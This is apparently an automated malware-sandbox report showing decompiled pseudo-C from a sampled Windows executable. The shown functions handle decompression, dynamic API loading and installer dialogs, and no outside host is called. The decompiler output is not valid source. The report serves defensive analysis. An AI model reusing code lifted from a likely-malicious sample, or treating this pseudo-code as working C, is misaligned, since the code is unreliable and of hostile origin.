                          								__eflags = __eax;
                          								 *(__ebp - 0x58) = __eax;
                          								goto L68;
                          							}
                          							__eax =  *(__ebp - 4);
                          							__ecx =  *(__ebp - 0x38);
                          							 *(__ebp - 0x84) = 8;
                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          							goto L132;
                          						case 8:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xa;
                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          							} else {
                          								__eax =  *(__ebp - 0x38);
                          								__ecx =  *(__ebp - 4);
                          								__eax =  *(__ebp - 0x38) + 0xf;
                          								 *(__ebp - 0x84) = 9;
                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          							}
                          							goto L132;
                          						case 9:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								goto L89;
                          							}
                          							__eflags =  *(__ebp - 0x60);
                          							if( *(__ebp - 0x60) == 0) {
                          								goto L171;
                          							}
                          							__eax = 0;
                          							__eflags =  *(__ebp - 0x38) - 7;
                          							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          							__eflags = _t258;
                          							0 | _t258 = _t258 + _t258 + 9;
                          							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          							goto L75;
                          						case 0xa:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xb;
                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x28);
                          							goto L88;
                          						case 0xb:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__ecx =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x20);
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          							} else {
                          								__eax =  *(__ebp - 0x24);
                          							}
                          							__ecx =  *(__ebp - 0x28);
                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          							L88:
                          							__ecx =  *(__ebp - 0x2c);
                          							 *(__ebp - 0x2c) = __eax;
                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          							L89:
                          							__eax =  *(__ebp - 4);
                          							 *(__ebp - 0x80) = 0x15;
                          							__eax =  *(__ebp - 4) + 0xa68;
                          							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          							goto L68;
                          						case 0xc:
                          							L99:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xc;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t334 = __ebp - 0x70;
                          							 *_t334 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t334;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							__eax =  *(__ebp - 0x2c);
                          							goto L101;
                          						case 0xd:
                          							goto L36;
                          						case 0xe:
                          							goto L45;
                          						case 0xf:
                          							goto L57;
                          						case 0x10:
                          							L109:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x10;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t365 = __ebp - 0x70;
                          							 *_t365 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t365;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							goto L111;
                          						case 0x11:
                          							L68:
                          							__esi =  *(__ebp - 0x58);
                          							 *(__ebp - 0x84) = 0x12;
                          							goto L132;
                          						case 0x12:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 0x58);
                          								 *(__ebp - 0x84) = 0x13;
                          								__esi =  *(__ebp - 0x58) + 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							__eflags = __eax;
                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                          							goto L130;
                          						case 0x13:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								_t469 = __ebp - 0x58;
                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                          								__eflags =  *_t469;
                          								 *(__ebp - 0x30) = 0x10;
                          								 *(__ebp - 0x40) = 8;
                          								L144:
                          								 *(__ebp - 0x7c) = 0x14;
                          								goto L145;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							 *(__ebp - 0x30) = 8;
                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          							L130:
                          							 *(__ebp - 0x58) = __eax;
                          							 *(__ebp - 0x40) = 3;
                          							goto L144;
                          						case 0x14:
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          							__eax =  *(__ebp - 0x80);
                          							goto L140;
                          						case 0x15:
                          							__eax = 0;
                          							__eflags =  *(__ebp - 0x38) - 7;
                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          							__al = __al & 0x000000fd;
                          							__eax = (__eflags >= 0) - 1 + 0xb;
                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          							goto L120;
                          						case 0x16:
                          							__eax =  *(__ebp - 0x30);
                          							__eflags = __eax - 4;
                          							if(__eax >= 4) {
                          								_push(3);
                          								_pop(__eax);
                          							}
                          							__ecx =  *(__ebp - 4);
                          							 *(__ebp - 0x40) = 6;
                          							__eax = __eax << 7;
                          							 *(__ebp - 0x7c) = 0x19;
                          							 *(__ebp - 0x58) = __eax;
                          							goto L145;
                          						case 0x17:
                          							L145:
                          							__eax =  *(__ebp - 0x40);
                          							 *(__ebp - 0x50) = 1;
                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          							goto L149;
                          						case 0x18:
                          							L146:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x18;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t484 = __ebp - 0x70;
                          							 *_t484 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t484;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L148:
                          							_t487 = __ebp - 0x48;
                          							 *_t487 =  *(__ebp - 0x48) - 1;
                          							__eflags =  *_t487;
                          							L149:
                          							__eflags =  *(__ebp - 0x48);
                          							if( *(__ebp - 0x48) <= 0) {
                          								__ecx =  *(__ebp - 0x40);
                          								__ebx =  *(__ebp - 0x50);
                          								0 = 1;
                          								__eax = 1 << __cl;
                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          								__eax =  *(__ebp - 0x7c);
                          								 *(__ebp - 0x44) = __ebx;
                          								goto L140;
                          							}
                          							__eax =  *(__ebp - 0x50);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          							__eax =  *(__ebp - 0x58);
                          							__esi = __edx + __eax;
                          							 *(__ebp - 0x54) = __esi;
                          							__ax =  *__esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								__cx = __ax >> 5;
                          								__eax = __eax - __ecx;
                          								__edx = __edx + 1;
                          								__eflags = __edx;
                          								 *__esi = __ax;
                          								 *(__ebp - 0x50) = __edx;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L148;
                          							} else {
                          								goto L146;
                          							}
                          						case 0x19:
                          							__eflags = __ebx - 4;
                          							if(__ebx < 4) {
                          								 *(__ebp - 0x2c) = __ebx;
                          								L119:
                          								_t393 = __ebp - 0x2c;
                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                          								__eflags =  *_t393;
                          								L120:
                          								__eax =  *(__ebp - 0x2c);
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          									goto L170;
                          								}
                          								__eflags = __eax -  *(__ebp - 0x60);
                          								if(__eax >  *(__ebp - 0x60)) {
                          									goto L171;
                          								}
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          								__eax =  *(__ebp - 0x30);
                          								_t400 = __ebp - 0x60;
                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          								__eflags =  *_t400;
                          								goto L123;
                          							}
                          							__ecx = __ebx;
                          							__eax = __ebx;
                          							__ecx = __ebx >> 1;
                          							__eax = __ebx & 0x00000001;
                          							__ecx = (__ebx >> 1) - 1;
                          							__al = __al | 0x00000002;
                          							__eax = (__ebx & 0x00000001) << __cl;
                          							__eflags = __ebx - 0xe;
                          							 *(__ebp - 0x2c) = __eax;
                          							if(__ebx >= 0xe) {
                          								__ebx = 0;
                          								 *(__ebp - 0x48) = __ecx;
                          								L102:
                          								__eflags =  *(__ebp - 0x48);
                          								if( *(__ebp - 0x48) <= 0) {
                          									__eax = __eax + __ebx;
                          									 *(__ebp - 0x40) = 4;
                          									 *(__ebp - 0x2c) = __eax;
                          									__eax =  *(__ebp - 4);
                          									__eax =  *(__ebp - 4) + 0x644;
                          									__eflags = __eax;
                          									L108:
                          									__ebx = 0;
                          									 *(__ebp - 0x58) = __eax;
                          									 *(__ebp - 0x50) = 1;
                          									 *(__ebp - 0x44) = 0;
                          									 *(__ebp - 0x48) = 0;
                          									L112:
                          									__eax =  *(__ebp - 0x40);
                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          										_t391 = __ebp - 0x2c;
                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          										__eflags =  *_t391;
                          										goto L119;
                          									}
                          									__eax =  *(__ebp - 0x50);
                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          									__eax =  *(__ebp - 0x58);
                          									__esi = __edi + __eax;
                          									 *(__ebp - 0x54) = __esi;
                          									__ax =  *__esi;
                          									__ecx = __ax & 0x0000ffff;
                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          									__eflags =  *(__ebp - 0xc) - __edx;
                          									if( *(__ebp - 0xc) >= __edx) {
                          										__ecx = 0;
                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          										__ecx = 1;
                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          										__ebx = 1;
                          										__ecx =  *(__ebp - 0x48);
                          										__ebx = 1 << __cl;
                          										__ecx = 1 << __cl;
                          										__ebx =  *(__ebp - 0x44);
                          										__ebx =  *(__ebp - 0x44) | __ecx;
                          										__cx = __ax;
                          										__cx = __ax >> 5;
                          										__eax = __eax - __ecx;
                          										__edi = __edi + 1;
                          										__eflags = __edi;
                          										 *(__ebp - 0x44) = __ebx;
                          										 *__esi = __ax;
                          										 *(__ebp - 0x50) = __edi;
                          									} else {
                          										 *(__ebp - 0x10) = __edx;
                          										0x800 = 0x800 - __ecx;
                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          										 *__esi = __dx;
                          									}
                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                          									if( *(__ebp - 0x10) >= 0x1000000) {
                          										L111:
                          										_t368 = __ebp - 0x48;
                          										 *_t368 =  *(__ebp - 0x48) + 1;
                          										__eflags =  *_t368;
                          										goto L112;
                          									} else {
                          										goto L109;
                          									}
                          								}
                          								__ecx =  *(__ebp - 0xc);
                          								__ebx = __ebx + __ebx;
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          								 *(__ebp - 0x44) = __ebx;
                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          									__ecx =  *(__ebp - 0x10);
                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          									__ebx = __ebx | 0x00000001;
                          									__eflags = __ebx;
                          									 *(__ebp - 0x44) = __ebx;
                          								}
                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                          								if( *(__ebp - 0x10) >= 0x1000000) {
                          									L101:
                          									_t338 = __ebp - 0x48;
                          									 *_t338 =  *(__ebp - 0x48) - 1;
                          									__eflags =  *_t338;
                          									goto L102;
                          								} else {
                          									goto L99;
                          								}
                          							}
                          							__edx =  *(__ebp - 4);
                          							__eax = __eax - __ebx;
                          							 *(__ebp - 0x40) = __ecx;
                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          							goto L108;
                          						case 0x1a:
                          							goto L55;
                          						case 0x1b:
                          							L75:
                          							__eflags =  *(__ebp - 0x64);
                          							if( *(__ebp - 0x64) == 0) {
                          								 *(__ebp - 0x88) = 0x1b;
                          								goto L170;
                          							}
                          							__eax =  *(__ebp - 0x14);
                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          							__eflags = __eax -  *(__ebp - 0x74);
                          							if(__eax >=  *(__ebp - 0x74)) {
                          								__eax = __eax +  *(__ebp - 0x74);
                          								__eflags = __eax;
                          							}
                          							__edx =  *(__ebp - 8);
                          							__cl =  *(__eax + __edx);
                          							__eax =  *(__ebp - 0x14);
                          							 *(__ebp - 0x5c) = __cl;
                          							 *(__eax + __edx) = __cl;
                          							__eax = __eax + 1;
                          							__edx = 0;
                          							_t274 = __eax %  *(__ebp - 0x74);
                          							__eax = __eax /  *(__ebp - 0x74);
                          							__edx = _t274;
                          							__eax =  *(__ebp - 0x68);
                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          							_t283 = __ebp - 0x64;
                          							 *_t283 =  *(__ebp - 0x64) - 1;
                          							__eflags =  *_t283;
                          							 *( *(__ebp - 0x68)) = __cl;
                          							goto L79;
                          						case 0x1c:
                          							while(1) {
                          								L123:
                          								__eflags =  *(__ebp - 0x64);
                          								if( *(__ebp - 0x64) == 0) {
                          									break;
                          								}
                          								__eax =  *(__ebp - 0x14);
                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          								__eflags = __eax -  *(__ebp - 0x74);
                          								if(__eax >=  *(__ebp - 0x74)) {
                          									__eax = __eax +  *(__ebp - 0x74);
                          									__eflags = __eax;
                          								}
                          								__edx =  *(__ebp - 8);
                          								__cl =  *(__eax + __edx);
                          								__eax =  *(__ebp - 0x14);
                          								 *(__ebp - 0x5c) = __cl;
                          								 *(__eax + __edx) = __cl;
                          								__eax = __eax + 1;
                          								__edx = 0;
                          								_t414 = __eax %  *(__ebp - 0x74);
                          								__eax = __eax /  *(__ebp - 0x74);
                          								__edx = _t414;
                          								__eax =  *(__ebp - 0x68);
                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          								__eflags =  *(__ebp - 0x30);
                          								 *( *(__ebp - 0x68)) = __cl;
                          								 *(__ebp - 0x14) = __edx;
                          								if( *(__ebp - 0x30) > 0) {
                          									continue;
                          								} else {
                          									goto L80;
                          								}
                          							}
                          							 *(__ebp - 0x88) = 0x1c;
                          							goto L170;
                          					}
                          				}
                          			}













                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00000000
                          0x00406828
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x00000000
                          0x0040667d
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                          • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                          • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                          • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405DA3(signed int _a4) {
                          				struct HINSTANCE__* _t5;
                          				CHAR* _t7;
                          				signed int _t9;
                          
                          				_t9 = _a4 << 3;
                          				_t7 =  *(_t9 + 0x409218);
                          				_t5 = GetModuleHandleA(_t7);
                          				if(_t5 != 0) {
                          					L2:
                          					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
                          				}
                          				_t5 = LoadLibraryA(_t7); // executed
                          				if(_t5 != 0) {
                          					goto L2;
                          				}
                          				return _t5;
                          			}







                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                          • LoadLibraryA.KERNEL32(?), ref: 00405DC0
                          • GetProcAddress.KERNEL32(00000000,?,?,00000000,00403268,00000008), ref: 00405DD1
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: AddressHandleLibraryLoadModuleProc
                          • String ID:
                          • API String ID: 310444273-0
                          • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                          • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                          • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                          • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph
                          [Graph image not preserved: control-flow graph of function 403964, with nodes marked Executed / Not Executed]
                          C-Code - Quality: 84%
                          			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                          				struct HWND__* _v32;
                          				void* _v84;
                          				void* _v88;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed int _t35;
                          				signed int _t37;
                          				signed int _t39;
                          				intOrPtr _t44;
                          				struct HWND__* _t49;
                          				signed int _t67;
                          				struct HWND__* _t73;
                          				signed int _t86;
                          				struct HWND__* _t91;
                          				signed int _t99;
                          				int _t103;
                          				signed int _t115;
                          				signed int _t116;
                          				int _t117;
                          				signed int _t122;
                          				struct HWND__* _t125;
                          				struct HWND__* _t126;
                          				int _t127;
                          				long _t130;
                          				int _t132;
                          				int _t133;
                          				void* _t134;
                          				void* _t141;
                          				void* _t142;
                          
                          				_t115 = _a8;
                          				if(_t115 == 0x110 || _t115 == 0x408) {
                          					_t35 = _a12;
                          					_t125 = _a4;
                          					__eflags = _t115 - 0x110;
                          					 *0x42047c = _t35;
                          					if(_t115 == 0x110) {
                          						 *0x423ea8 = _t125;
                          						 *0x420490 = GetDlgItem(_t125, 1);
                          						_t91 = GetDlgItem(_t125, 2);
                          						_push(0xffffffff);
                          						_push(0x1c);
                          						 *0x41f458 = _t91;
                          						E00403E37(_t125);
                          						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
                          						 *0x42366c = E0040140B(4);
                          						_t35 = 1;
                          						__eflags = 1;
                          						 *0x42047c = 1;
                          					}
                          					_t122 =  *0x4091bc; // 0x0
                          					_t133 = 0;
                          					_t130 = (_t122 << 6) +  *0x423ec0;
                          					__eflags = _t122;
                          					if(_t122 < 0) {
                          						L34:
                          						E00403E83(0x40b);
                          						while(1) {
                          							_t37 =  *0x42047c;
                          							 *0x4091bc =  *0x4091bc + _t37;
                          							_t130 = _t130 + (_t37 << 6);
                          							_t39 =  *0x4091bc; // 0x0
                          							__eflags = _t39 -  *0x423ec4; // 0x2
                          							if(__eflags == 0) {
                          								E0040140B(1);
                          							}
                          							__eflags =  *0x42366c - _t133; // 0x7fffffff
                          							if(__eflags != 0) {
                          								break;
                          							}
                          							_t44 =  *0x423ec4; // 0x2
                          							__eflags =  *0x4091bc - _t44; // 0x0
                          							if(__eflags >= 0) {
                          								break;
                          							}
                          							_t116 =  *(_t130 + 0x14);
                          							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                          							_push( *((intOrPtr*)(_t130 + 0x20)));
                          							_push(0xfffffc19);
                          							E00403E37(_t125);
                          							_push( *((intOrPtr*)(_t130 + 0x1c)));
                          							_push(0xfffffc1b);
                          							E00403E37(_t125);
                          							_push( *((intOrPtr*)(_t130 + 0x28)));
                          							_push(0xfffffc1a);
                          							E00403E37(_t125);
                          							_t49 = GetDlgItem(_t125, 3);
                          							__eflags =  *0x423f2c - _t133; // 0x0
                          							_v32 = _t49;
                          							if(__eflags != 0) {
                          								_t116 = _t116 & 0x0000fefd | 0x00000004;
                          								__eflags = _t116;
                          							}
                          							ShowWindow(_t49, _t116 & 0x00000008);
                          							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                          							E00403E59(_t116 & 0x00000002);
                          							_t117 = _t116 & 0x00000004;
